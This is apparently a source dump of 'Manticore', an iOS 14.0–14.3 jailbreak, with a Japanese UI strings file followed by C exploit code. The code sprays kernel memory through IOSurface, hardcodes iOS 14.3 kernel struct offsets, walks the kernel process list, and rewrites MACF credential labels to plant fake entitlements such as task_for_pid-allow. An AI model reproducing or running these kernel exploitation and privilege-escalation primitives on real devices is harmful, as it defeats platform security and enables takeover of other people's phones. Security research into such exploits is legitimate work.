23 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "Kda-OK-gFg"; */
24 | "Kda-OK-gFg.text" = "iOS 14.0 - 14.3";
25 |
26 | /* Class = "UIButton"; normalTitle = "Save & Set APNonce"; ObjectID = "WEh-zy-xS5"; */
27 | "WEh-zy-xS5.normalTitle" = "APNonceの保存 & セット";
28 |
29 | /* Class = "UIButton"; normalTitle = "Options"; ObjectID = "czz-vo-cHF"; */
30 | "czz-vo-cHF.normalTitle" = "設定";
31 |
32 | /* Class = "UILabel"; text = "Block OTA Updates"; ObjectID = "efL-nQ-xsh"; */
33 | "efL-nQ-xsh.text" = "OTAアップデートの無効化";
34 |
35 | /* Class = "UILabel"; text = "Compatibility"; ObjectID = "i1H-yX-3n8"; */
36 | "i1H-yX-3n8.text" = "互換性";
37 |
38 | /* Class = "UILabel"; text = "Remove ScreenTime"; ObjectID = "kyq-MK-M3C"; */
39 | "kyq-MK-M3C.text" = "スクリーンタイムの無効化";
40 |
41 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "mUJ-nK-XHv"; */
42 | "mUJ-nK-XHv.text" = "Manticore";
43 |
44 | /* Class = "UILabel"; text = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!"; ObjectID = "o5h-H3-igh"; */
45 | "o5h-H3-igh.text" = "iOS 14.3のiPhone11は互換性があります!";
46 |
47 | /* Class = "UITextView"; text = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda."; ObjectID = "oZg-Pf-ew7"; */
48 | "oZg-Pf-ew7.text" = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda.";
49 |
50 | /* Class = "UILabel"; text = "Log ECID"; ObjectID = "voS-Ev-D3K"; */
51 | "voS-Ev-D3K.text" = "ECIDを記録する";
52 |
53 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "xtR-ck-MtY"; */
54 | "xtR-ck-MtY.text" = "iOS 14.0 - 14.3";
55 |
56 | /* Class = "UILabel"; text = "Toggle Log Window"; ObjectID = "yiE-wg-tPU"; */
57 | "yiE-wg-tPU.text" = "ログ画面の切り替え";
--------------------------------------------------------------------------------
/manticore/lib/Bazad/IOSurface.h:
--------------------------------------------------------------------------------
1 | /*
2 | * iosurface.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__IOSURFACE_H_
6 | #define VOUCHER_SWAP__IOSURFACE_H_
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include "../IOKit/IOKitLib.h"
15 |
16 | #include "exploit_utilities.h"
17 |
18 | #ifdef IOSURFACE_EXTERN
19 | #define extern IOSURFACE_EXTERN
20 | #endif
21 |
22 | // The IOSurfaceRoot service.
23 | extern mach_port_t IOSurfaceRoot;
24 |
25 | // An IOSurfaceRootUserClient instance.
26 | extern mach_port_t IOSurfaceRootUserClient;
27 |
28 | // The ID of the IOSurface we're using.
29 | extern uint32_t IOSurface_id;
30 | enum {
31 | kIOCFSerializeToBinary = 0x00000001U,
32 | };
33 |
34 | #define kOSSerializeBinarySignature 0x000000D3U
35 |
36 | enum {
37 | kOSSerializeDictionary = 0x01000000U,
38 | kOSSerializeArray = 0x02000000U,
39 | kOSSerializeSet = 0x03000000U,
40 | kOSSerializeNumber = 0x04000000U,
41 | kOSSerializeSymbol = 0x08000000U,
42 | kOSSerializeString = 0x09000000U,
43 | kOSSerializeData = 0x0a000000U,
44 | kOSSerializeBoolean = 0x0b000000U,
45 | kOSSerializeObject = 0x0c000000U,
46 |
47 | kOSSerializeTypeMask = 0x7F000000U,
48 | kOSSerializeDataMask = 0x00FFFFFFU,
49 |
50 | kOSSerializeEndCollection = 0x80000000U,
51 |
52 | kOSSerializeMagic = 0x000000d3U,
53 | };
54 |
55 | /*
56 | * IOSurface_init
57 | *
58 | * Description:
59 | * Initialize the IOSurface subsystem.
60 | */
61 | bool IOSurface_init(void);
62 |
63 | /*
64 | * IOSurface_deinit
65 | *
66 | * Description:
67 | * Tear down the IOSurface subsystem. Any sprayed memory will be automatically deallocated.
68 | */
69 | void IOSurface_deinit(void);
70 |
71 | /*
72 | * IOSurface_spray_with_gc
73 | *
74 | * Description:
75 | * Spray kernel memory using IOSurface properties.
76 | *
77 | * The current implementation stores each data allocation in an OSString. The reason for this
78 | * is that OSString contents will be allocated using kalloc() even for allocations larger than
79 | * the page size. OSData on the other hand will use kmem_alloc() for large allocations.
80 | * Consequently, the last byte of data will be zeroed out to create a null terminator.
81 | */
82 | bool IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,
83 | void *data, uint32_t data_size,
84 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
85 |
86 | /*
87 | * IOSurface_spray_size_with_gc
88 | *
89 | * Description:
90 | * Spray kernel memory using IOSurface properties.
91 | *
92 | * This function computes the number of elements per array automatically.
93 | */
94 | bool IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,
95 | void *data, uint32_t data_size,
96 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
97 |
98 | /*
99 | * IOSurface_spray_read_array
100 | *
101 | * Description:
102 | * Read back the data elements in a particular array in a particular IOSurface spray.
103 | */
104 | bool IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,
105 | void (^callback)(uint32_t data_id, void *data, size_t size));
106 |
107 | /*
108 | * IOSurface_spray_read_all_data
109 | *
110 | * Description:
111 | * Read back all the data elements in an IOSurface spray.
112 | */
113 | bool IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,
114 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));
115 |
116 | /*
117 | * IOSurface_spray_remove_array
118 | *
119 | * Description:
120 | * Remove a particular array from an IOSurface spray, freeing the contained data elements.
121 | */
122 | bool IOSurface_spray_remove_array(uint32_t array_id);
123 |
124 | /*
125 | * IOSurface_spray_clear
126 | *
127 | * Description:
128 | * Remove all the arrays from an IOSurface spray, freeing all the data elements.
129 | */
130 | bool IOSurface_spray_clear(uint32_t array_count);
131 |
132 | // ---- IOSurface types ---------------------------------------------------------------------------
133 |
134 | struct _IOSurfaceFastCreateArgs {
135 | uint64_t address;
136 | uint32_t width;
137 | uint32_t height;
138 | uint32_t pixel_format;
139 | uint32_t bytes_per_element;
140 | uint32_t bytes_per_row;
141 | uint32_t alloc_size;
142 | };
143 |
144 | struct IOSurfaceLockResult {
145 | uint64_t addr1;
146 | uint64_t addr2;
147 | uint64_t addr3;
148 | uint32_t surface_id;
149 | uint8_t _pad2[0xdd0-0x18-0x4];
150 | };
151 |
152 | struct IOSurfaceValueArgs {
153 | uint32_t surface_id;
154 | uint32_t _out1;
155 | union {
156 | uint32_t xml[0];
157 | char string[0];
158 | };
159 | };
160 |
161 | struct IOSurfaceValueArgs_string {
162 | uint32_t surface_id;
163 | uint32_t _out1;
164 | uint32_t string_data;
165 | char null;
166 | };
167 |
168 | struct IOSurfaceValueResultArgs {
169 | uint32_t out;
170 | };
171 |
172 |
173 | bool IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size);
174 |
175 | #undef extern
176 |
177 | #endif
178 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/iosurface.c:
--------------------------------------------------------------------------------
1 | /*
2 | * iosurface.c
3 | * Brandon Azad
4 | */
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #include "IOKitUser/IOKitLib.h"
14 |
15 | #include
16 | #include
17 |
18 | enum {
19 | kOSSerializeDictionary = 0x01000000,
20 | kOSSerializeArray = 0x02000000,
21 | kOSSerializeSet = 0x03000000,
22 | kOSSerializeNumber = 0x04000000,
23 | kOSSerializeSymbol = 0x08000000,
24 | kOSSerializeString = 0x09000000,
25 | kOSSerializeData = 0x0a000000,
26 | kOSSerializeBoolean = 0x0b000000,
27 | kOSSerializeObject = 0x0c000000,
28 | kOSSerializeTypeMask = 0x7f000000,
29 | kOSSerializeDataMask = 0x00ffffff,
30 | kOSSerializeEndCollection = 0x80000000,
31 | kOSSerializeBinarySignature = 0x000000d3,
32 | };
33 |
34 | // This value encodes to 0x00ffffff, so any larger value will cause IOSurface_property_key() to
35 | // wrap and collide with a smaller value.
36 | #define MAX_IOSURFACE_PROPERTY_INDEX (0x00fd02fe)
37 |
38 | // ---- IOSurface types ---------------------------------------------------------------------------
39 |
40 | struct _IOSurfaceFastCreateArgs {
41 | uint64_t address;
42 | uint32_t width;
43 | uint32_t height;
44 | uint32_t pixel_format;
45 | uint32_t bytes_per_element;
46 | uint32_t bytes_per_row;
47 | uint32_t alloc_size;
48 | };
49 |
50 | struct IOSurfaceLockResult {
51 | //uint8_t _pad1[0x18];
52 | uint8_t *mem;
53 | uint8_t *shared_B0;
54 | uint8_t *shared_40;
55 | uint32_t surface_id;
56 | uint8_t _pad2[0xf60-0x18-0x4];
57 | };
58 |
59 | struct IOSurfaceValueArgs {
60 | uint32_t surface_id;
61 | uint32_t field_4;
62 | union {
63 | uint32_t xml[0];
64 | char string[0];
65 | };
66 | };
67 |
68 | struct IOSurfaceValueResultArgs {
69 | uint32_t field_0;
70 | };
71 |
72 | // ---- Global variables --------------------------------------------------------------------------
73 |
74 | static uint32_t __unused IOSurface_property_index = 0;
75 |
76 | // Is the IOSurface subsystem initialized?
77 | static bool IOSurface_initialized;
78 |
79 | // The IOSurfaceRoot service.
80 | mach_port_t IOSurfaceRoot;
81 |
82 | // An IOSurfaceRootUserClient instance.
83 | mach_port_t IOSurfaceRootUserClient;
84 |
85 | // The ID of the IOSurface we're using.
86 | uint32_t IOSurface_id;
87 |
88 | mach_port_t IOSurface_worker_uc;
89 | uint32_t IOSurface_worker_id;
90 |
91 | // ---- External methods --------------------------------------------------------------------------
92 |
93 | static bool
94 | IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size) {
95 | struct IOSurfaceValueResultArgs result;
96 | size_t result_size = sizeof(result);
97 | kern_return_t kr = IOConnectCallMethod(
98 | IOSurface_worker_uc,
99 | 9, // set_value
100 | NULL, 0,
101 | args, args_size,
102 | NULL, NULL,
103 | &result, &result_size);
104 | if (kr != KERN_SUCCESS) {
105 | util_error("Failed to %s value in %s: 0x%x", "set", "IOSurface", kr);
106 | return false;
107 | }
108 | return true;
109 | }
110 |
111 | // ---- Initialization ----------------------------------------------------------------------------
112 |
113 | uint32_t iosurface_create_fast()
114 | {
115 | kern_return_t kr;
116 | struct _IOSurfaceFastCreateArgs create_args = { .alloc_size = (uint32_t) g_exp.pagesize };
117 | struct IOSurfaceLockResult lock_result;
118 | size_t lock_result_size = sizeof(lock_result);
119 | kr = IOConnectCallMethod(
120 | IOSurfaceRootUserClient,
121 | 6, // create_surface_client_fast_path
122 | NULL, 0,
123 | &create_args, sizeof(create_args),
124 | NULL, NULL,
125 | &lock_result, &lock_result_size);
126 | if (kr != KERN_SUCCESS) {
127 | util_error("could not create %s: 0x%x", "IOSurfaceClient", kr);
128 | return 0;
129 | }
130 | return lock_result.surface_id;
131 | }
132 |
133 | uint32_t iosurface_s_get_ycbcrmatrix(void)
134 | {
135 | uint64_t i_scalar[1] = { 1 }; // fixed, first valid client obj
136 | uint64_t o_scalar[1];
137 | uint32_t i_count = 1;
138 | uint32_t o_count = 1;
139 |
140 | kern_return_t kr = IOConnectCallMethod(
141 | IOSurfaceRootUserClient,
142 | 8, // s_get_ycbcrmatrix
143 | i_scalar, i_count,
144 | NULL, 0,
145 | o_scalar, &o_count,
146 | NULL, NULL);
147 | if (kr != KERN_SUCCESS) {
148 | util_error("s_get_ycbcrmatrix error: 0x%x", kr);
149 | return 0;
150 | }
151 | return (uint32_t)o_scalar[0];
152 | }
153 |
154 | void iosurface_s_set_indexed_timestamp(uint64_t v)
155 | {
156 | uint64_t i_scalar[3] = {
157 | 1, // fixed, first valid client obj
158 | 0, // index
159 | v, // value
160 | };
161 | uint32_t i_count = 3;
162 |
163 | kern_return_t kr = IOConnectCallMethod(
164 | IOSurfaceRootUserClient,
165 | 33, // s_set_indexed_timestamp
166 | i_scalar, i_count,
167 | NULL, 0,
168 | NULL, NULL,
169 | NULL, NULL);
170 | if (kr != KERN_SUCCESS) {
171 | util_error("s_set_indexed_timestamp error: 0x%x", kr);
172 | }
173 | }
174 |
175 | static void build_essential_entitlements(void){
176 | CFMutableArrayRef array;
177 | CFDictionaryRef dict;
178 | CFStringRef key = CFSTR("essential-entitlements");
179 | CFStringRef ent_keys[] = {
180 | CFSTR("task_for_pid-allow"),
181 | CFSTR("com.apple.system-task-ports"),
182 | CFSTR("com.apple.private.security.container-manager"),
183 | CFSTR("com.apple.private.security.storage.AppBundles"),
184 | };
185 | CFTypeRef ent_values[] = {
186 | kCFBooleanTrue,
187 | kCFBooleanTrue,
188 | kCFBooleanTrue,
189 | kCFBooleanTrue,
190 | };
191 |
192 | dict = CFDictionaryCreate(NULL, (void *)ent_keys, (void *)ent_values, arrayn(ent_keys),
193 | &kCFCopyStringDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
194 | array = CFArrayCreateMutable(kCFAllocatorDefault, 0, &kCFTypeArrayCallBacks);
195 | CFArrayAppendValue(array, dict);
196 | CFArrayAppendValue(array, key);
197 |
198 | void *hIOKit = dlopen("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_LOCAL);
199 | static CFDataRef (*IOCFSerialize)(CFTypeRef, uint32_t);
200 | IOCFSerialize = dlsym(hIOKit, "IOCFSerialize");
201 | assert(IOCFSerialize != NULL);
202 |
203 | CFDataRef data = IOCFSerialize(array, 1);
204 |
205 | size_t len = CFDataGetLength(data);
206 | struct IOSurfaceValueArgs *args = malloc(sizeof(*args) + len);
207 | args->surface_id = IOSurface_worker_id;
208 | args->field_4 = 0;
209 | memcpy(args->xml, CFDataGetBytePtr(data), len);
210 | IOSurface_set_value(args, sizeof(*args) + len);
211 | free(args);
212 |
213 | CFRelease(dict);
214 | CFRelease(array);
215 | CFRelease(data);
216 | }
217 |
218 |
219 | bool IOSurface_init(void) {
220 | if (IOSurface_initialized) {
221 | return true;
222 | }
223 | IOSurfaceRoot = IOServiceGetMatchingService(
224 | kIOMasterPortDefault,
225 | IOServiceMatching("IOSurfaceRoot"));
226 | if (IOSurfaceRoot == MACH_PORT_NULL) {
227 | util_error("could not find %s", "IOSurfaceRoot");
228 | return false;
229 | }
230 | kern_return_t kr = IOServiceOpen(
231 | IOSurfaceRoot,
232 | mach_task_self(),
233 | 0,
234 | &IOSurfaceRootUserClient);
235 | if (kr != KERN_SUCCESS) {
236 | util_error("could not open %s", "IOSurfaceRootUserClient");
237 | return false;
238 | }
239 | kr = IOServiceOpen(IOSurfaceRoot, mach_task_self(), 0, &IOSurface_worker_uc);
240 | if (kr != KERN_SUCCESS) {
241 | util_error("could not open %s", "IOSurfaceRoot worker UserClient");
242 | return false;
243 | }
244 | struct _IOSurfaceFastCreateArgs create_args = { .alloc_size = (uint32_t) g_exp.pagesize };
245 | struct IOSurfaceLockResult lock_result;
246 | size_t lock_result_size = sizeof(lock_result);
247 | kr = IOConnectCallMethod(
248 | IOSurfaceRootUserClient,
249 | 6, // create_surface_client_fast_path
250 | NULL, 0,
251 | &create_args, sizeof(create_args),
252 | NULL, NULL,
253 | &lock_result, &lock_result_size);
254 | if (kr != KERN_SUCCESS) {
255 | util_error("could not create %s: 0x%x", "IOSurfaceClient", kr);
256 | return false;
257 | }
258 | IOSurface_id = lock_result.surface_id;
259 | kr = IOConnectCallMethod(
260 | IOSurface_worker_uc,
261 | 6, // create_surface_client_fast_path
262 | NULL, 0,
263 | &create_args, sizeof(create_args),
264 | NULL, NULL,
265 | &lock_result, &lock_result_size);
266 | if (kr != KERN_SUCCESS) {
267 | util_error("could not create %s: 0x%x", "IOSurfaceClient worker", kr);
268 | return false;
269 | }
270 | IOSurface_worker_id = lock_result.surface_id;
271 | build_essential_entitlements();
272 | IOSurface_initialized = true;
273 | return true;
274 | }
275 |
276 | void IOSurface_deinit(void) {
277 | assert(IOSurface_initialized);
278 | IOSurface_initialized = false;
279 | IOSurface_id = 0;
280 | IOServiceClose(IOSurfaceRootUserClient);
281 | IOObjectRelease(IOSurfaceRoot);
282 | }
283 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/k_offsets.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #define Q_INTERNAL
6 | #include
7 | #include "include/util/arm.h"
8 |
9 | #ifndef _arm64e
10 | #define _arm64e (is_pac == 0)
11 | #endif
12 |
13 | static void offsets_base_iOS_14_x() {
14 | kc_kernel_base = 0xFFFFFFF007004000;
15 |
16 | SIZE(ipc_entry) = 0x18;
17 | OFFSET(ipc_entry, ie_object) = 0x0;
18 |
19 | OFFSET(ipc_port, ip_bits) = 0x0;
20 | OFFSET(ipc_port, ip_references) = 0x4;
21 | OFFSET(ipc_port, ip_kobject) = 0x68;
22 |
23 | OFFSET(ipc_space, is_table_size) = 0x14;
24 | OFFSET(ipc_space, is_table) = 0x20;
25 |
26 | OFFSET(task, map) = 0x28;
27 | OFFSET(task, itk_space) = 0x330;
28 |
29 | #if _arm64e
30 | OFFSET(task, bsd_info) = 0x3a0;
31 | OFFSET(task, t_flags) = 0x3f4;
32 | #else
33 | OFFSET(task, bsd_info) = 0x390;
34 | OFFSET(task, t_flags) = 0x3d8;
35 | #endif
36 |
37 | OFFSET(proc, le_next) = 0x00;
38 | OFFSET(proc, le_prev) = 0x08;
39 | OFFSET(proc, task) = 0x10;
40 | OFFSET(proc, p_pid) = 0x68;
41 | OFFSET(proc, p_ucred) = 0xf0;
42 | OFFSET(proc, p_fd) = 0xf8;
43 | OFFSET(proc, csflags) = 0x280;
44 | OFFSET(proc, gid) = 0x34;
45 | OFFSET(proc, rgid) = 0x3c;
46 | OFFSET(proc, uid) = 0x30;
47 | OFFSET(proc, ruid) = 0x38;
48 | OFFSET(proc, pid) = 0x68;
49 |
50 | OFFSET(filedesc, fd_ofiles) = 0x00;
51 | OFFSET(fileproc, fp_glob) = 0x10;
52 | OFFSET(fileglob, fg_data) = 0x38;
53 | OFFSET(pipe, buffer) = 0x10;
54 |
55 | OFFSET(ucred, cr_posix) = 0x18;
56 | OFFSET(ucred, cr_uid) = 0x18;
57 | OFFSET(ucred, cr_svuid) = 0x20;
58 | OFFSET(ucred, cr_ngroups) = 0x24;
59 | OFFSET(ucred, cr_groups) = 0x28;
60 | OFFSET(ucred, cr_svgid) = 0x6c;
61 | OFFSET(ucred, cr_rgid) = 0x68;
62 | OFFSET(ucred, cr_label) = 0x78;
63 |
64 | SIZE(posix_cred) = 0x60;
65 |
66 | OFFSET(OSDictionary, count) = 0x14;
67 | OFFSET(OSDictionary, capacity) = 0x18;
68 | OFFSET(OSDictionary, dictionary) = 0x20;
69 |
70 | OFFSET(OSString, string) = 0x10;
71 |
72 | OFFSET(IOSurfaceRootUserClient, surfaceClients) = 0x118;
73 | OFFSET(IOSurfaceClient, surface) = 0x40;
74 | OFFSET(IOSurface, values) = 0xe8;
75 |
76 | OFFSET(vnode, vmount) = 0xd8;
77 | }
78 |
79 | void kernel_offsets_init(void) {
80 | fprintf(stdout, "has_pac: %x\n", g_exp.has_PAC);
81 | util_info("using default iOS 14.3 Offsets");
82 | offsets_base_iOS_14_x();
83 | return;
84 | }
85 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/k_utils.c:
--------------------------------------------------------------------------------
1 | //
2 | // k_utils.c
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/24.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 |
20 | #define KPTR_NULL ((kptr_t) 0)
21 | #define _assert(x)
22 |
23 | static void kproc_foreach(kptr_t proc, bool (^match)(kptr_t, pid_t)){
24 | pid_t pid;
25 | kptr_t next;
26 | while (KERN_POINTER_VALID(proc)) {
27 | pid = kapi_read32(proc + OFFSET(proc, p_pid));
28 | if (g_exp.debug) {
29 | util_msleep(100);
30 | }
31 | if (match(proc, pid)) {
32 | break;
33 | }
34 | next = kapi_read_kptr(proc + OFFSET(proc, le_next));
35 | if (next == KPTR_NULL) {
36 | break;
37 | }
38 | proc = next;
39 | }
40 | }
41 |
42 | kptr_t kproc_find_pid0(kptr_t proc){
43 | __block kptr_t proc0 = KPTR_NULL;
44 | bool (^const handler)(kptr_t, pid_t) = ^ bool (kptr_t found_proc, pid_t found_pid) {
45 | if (found_pid == 0) {
46 | proc0 = found_proc;
47 | return true;
48 | }
49 | return false;
50 | };
51 | kproc_foreach(proc, handler);
52 | if(proc0 == KPTR_NULL) {
53 | util_error("can not find proc0");
54 | }
55 | return proc0;
56 | }
57 |
58 | static void kproc_foreach_reverse(kptr_t proc, bool (^match)(kptr_t, pid_t)){
59 | pid_t pid;
60 | kptr_t prev;
61 | while (KERN_POINTER_VALID(proc)) {
62 | pid = kapi_read32(proc + OFFSET(proc, p_pid));
63 | if (match(proc, pid)) {
64 | break;
65 | }
66 | prev = kapi_read_kptr(proc + OFFSET(proc, le_prev));
67 | if (prev == KPTR_NULL) {
68 | break;
69 | }
70 | proc = prev - OFFSET(proc, le_next);
71 | }
72 | }
73 |
74 |
75 | kptr_t kproc_find_by_pid(pid_t pid) {
76 | __block kptr_t proc = KPTR_NULL;
77 | bool (^const handler)(kptr_t, pid_t) = ^ bool (kptr_t found_proc, pid_t found_pid) {
78 | if (found_pid == pid) {
79 | proc = found_proc;
80 | return true;
81 | }
82 | return false;
83 | };
84 | kproc_foreach_reverse(g_exp.kernel_proc, handler);
85 | if(proc == KPTR_NULL) {
86 | util_error("can not find kproc for pid %u", pid);
87 | }
88 | return proc;
89 | }
90 |
91 | kptr_t ipc_entry_lookup(mach_port_t port_name) {
92 | kptr_t itk_space = g_exp.self_ipc_space;
93 | uint32_t table_size = kapi_read32(itk_space + OFFSET(ipc_space, is_table_size));
94 | uint32_t port_index = MACH_PORT_INDEX(port_name);
95 | if (port_index >= table_size) {
96 | util_warning("invalid port name %#x", port_name);
97 | return 0;
98 | }
99 | kptr_t is_table = kapi_read_kptr(itk_space + OFFSET(ipc_space, is_table));
100 | kptr_t entry = is_table + port_index * SIZE(ipc_entry);
101 | return entry;
102 | }
103 |
104 | kptr_t port_name_to_ipc_port(mach_port_t port_name) {
105 | kptr_t entry = ipc_entry_lookup(port_name);
106 | kptr_t ipc_port = kapi_read_kptr(entry + OFFSET(ipc_entry, ie_object));
107 | return ipc_port;
108 | }
109 |
110 | kptr_t port_name_to_kobject(mach_port_t port_name) {
111 | kptr_t ipc_port = port_name_to_ipc_port(port_name);
112 | kptr_t kobject = kapi_read_kptr(ipc_port + OFFSET(ipc_port, ip_kobject));
113 | return kobject;
114 | }
115 |
116 |
117 | void debug_dump_ipc_port(mach_port_t port_name, kptr_t *kobj) {
118 | kptr_t entry = ipc_entry_lookup(port_name);
119 | if (entry == 0) {
120 | util_error("can not find port entry %#x", port_name);
121 | return;
122 | }
123 | kptr_t object = kapi_read_kptr(entry + OFFSET(ipc_entry, ie_object));
124 | uint32_t ip_bits = kapi_read32(object + OFFSET(ipc_port, ip_bits));
125 | uint32_t ip_refs = kapi_read32(object + OFFSET(ipc_port, ip_references));
126 | kptr_t kobject = kapi_read_kptr(object + OFFSET(ipc_port, ip_kobject));
127 | printf("ipc_port: ip_bits %#x, ip_refs %#x\n", ip_bits, ip_refs);
128 | printf("ip_kobject: %#llx\n", kobject);
129 | if (kobj) {
130 | *kobj = kobject;
131 | }
132 | }
133 |
134 | void debug_dump_proc_cred(kptr_t proc) {
135 | kptr_t proc_p_ucred = kapi_read_kptr(proc + OFFSET(proc, p_ucred));
136 | kptr_t p_ucred_cr_label = proc_p_ucred + OFFSET(ucred, cr_posix);
137 |
138 | char old_cred[SIZE(posix_cred)];
139 | kapi_read(p_ucred_cr_label, old_cred, SIZE(posix_cred));
140 |
141 | kptr_t cr_label = kapi_read_kptr(p_ucred_cr_label + SIZE(posix_cred));
142 |
143 | util_info("cr_label %#llx", cr_label);
144 | if (cr_label) {
145 | int l_flags = kapi_read32(cr_label + 0x00);
146 | util_info("l_flags %#x", l_flags);
147 | kptr_t labels[3];
148 | labels[0] = kapi_read_kptr(cr_label + 0x08);
149 | labels[1] = kapi_read_kptr(cr_label + 0x10);
150 | labels[2] = kapi_read_kptr(cr_label + 0x18);
151 | for (int i = 0; i < arrayn(labels); i++) {
152 | util_info("label[%d] %#llx", i, labels[i]);
153 | }
154 | }
155 | util_printf("---- end ----\n");
156 | util_msleep(200);
157 | }
158 |
159 | struct kOSDict *kernel_fetch_dict(kptr_t dict_addr){
160 | char obj[0x28];
161 | kapi_read(dict_addr, obj, sizeof(obj));
162 | uint32_t cap = *(uint32_t *)(obj + OFFSET(OSDictionary, capacity));
163 | struct kOSDict *dict;
164 | size_t alloc_size = sizeof(*dict) + cap * (sizeof(struct kDictEntry) + sizeof(char *) + 256);
165 | dict = (struct kOSDict *)malloc(alloc_size);
166 | dict->self_addr = dict_addr;
167 | dict->cap = cap;
168 | dict->count = *(uint32_t *)(obj + OFFSET(OSDictionary, count));
169 | dict->items_addr = kapi_read_kptr(dict_addr + OFFSET(OSDictionary, dictionary));
170 | char *ptr = dict->data;
171 | dict->items = (struct kDictEntry *)ptr;
172 | ptr += sizeof(struct kDictEntry) * dict->cap;
173 | dict->names = (char **)ptr;
174 | ptr += sizeof(char *) * dict->cap;
175 | for (int i = 0; i < dict->cap; i++) {
176 | dict->names[i] = ptr;
177 | ptr += 256;
178 | }
179 | util_info("dict %#llx, items %#llx, count %u, capacity %u",
180 | dict->self_addr, dict->items_addr, dict->count, dict->cap);
181 | alloc_size = sizeof(struct kDictEntry) * dict->cap;
182 | kapi_read(dict->items_addr, dict->items, alloc_size);
183 | for (int i = 0; i < dict->count; i++) {
184 | char obj[0x18];
185 | kapi_read(dict->items[i].key, obj, sizeof(obj));
186 | // OSSymbol
187 | uint32_t len = *(uint32_t *)(obj + 0xc) >> 14;
188 | if (len >= 256) {
189 | len = 255;
190 | }
191 | // PACed in iOS 14.3
192 | kptr_t string = *(kptr_t *)(obj + OFFSET(OSString, string));
193 | string |= 0xffffff8000000000;
194 | kapi_read(string, dict->names[i], len);
195 | dict->names[i][len] = 0;
196 | util_info(" -> %s", dict->names[i]);
197 | }
198 | return dict;
199 | }
200 |
201 | struct kOSDict *proc_fetch_MACF(kptr_t proc){
202 | kptr_t proc_p_ucred = kapi_read_kptr(proc + OFFSET(proc, p_ucred));
203 | kptr_t p_ucred_cr_label = proc_p_ucred + OFFSET(ucred, cr_posix) + SIZE(posix_cred);
204 |
205 | kptr_t cr_label = kapi_read_kptr(p_ucred_cr_label);
206 |
207 | if (cr_label == 0) {
208 | util_error("cr_label is NULL?");
209 | return NULL;
210 | }
211 |
212 | kptr_t MACF_slot = kapi_read_kptr(cr_label + 0x08);
213 | if (MACF_slot == 0) {
214 | util_error("MACF slot is NULL?");
215 | return NULL;
216 | }
217 | struct kOSDict *macf = kernel_fetch_dict(MACF_slot);
218 | return macf;
219 | }
220 |
221 | void proc_write_MACF(kptr_t proc, struct kOSDict *macf){
222 | size_t alloc_size = sizeof(struct kDictEntry) * macf->cap;
223 | kapi_write32(macf->self_addr + OFFSET(OSDictionary, count), macf->count);
224 | kapi_write(macf->items_addr, macf->items, alloc_size);
225 | }
226 |
227 | extern mach_port_t IOSurface_worker_uc;
228 | extern uint32_t IOSurface_worker_id;
229 |
230 | static struct kOSDict *fake_ents;
231 |
232 | void prepare_fake_entitlements(void){
233 | kptr_t surfRoot = port_name_to_kobject(IOSurface_worker_uc);
234 | kptr_t surfClients = kapi_read_kptr(surfRoot + OFFSET(IOSurfaceRootUserClient, surfaceClients));
235 | kptr_t surfClient = kapi_read_kptr(surfClients + sizeof(kptr_t) * IOSurface_worker_id);
236 | kptr_t surface = kapi_read_kptr(surfClient + OFFSET(IOSurfaceClient, surface));
237 | kptr_t values = kapi_read_kptr(surface + OFFSET(IOSurface, values));
238 |
239 | struct kOSDict *dict = kernel_fetch_dict(values);
240 | // [0] CreationProperties
241 | // [1] essential-entitlements
242 | for (int i = 0; i < dict->count; i++) {
243 | if (!strcmp(dict->names[i], "essential-entitlements")) {
244 | fake_ents = kernel_fetch_dict(dict->items[i].value);
245 | break;
246 | }
247 | }
248 | fail_if(fake_ents == NULL, "no prepared entitlements?");
249 | free(dict);
250 | }
251 |
252 | struct kDictEntry *borrow_fake_entitlement(const char *name){
253 | struct kDictEntry *entry = NULL;
254 | for (int i = 0; i < fake_ents->count; i++) {
255 | if (!strcmp(fake_ents->names[i], name)) {
256 | entry = &fake_ents->items[i];
257 | }
258 | }
259 | return entry;
260 | }
261 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/kapi_mem.c:
--------------------------------------------------------------------------------
1 | //
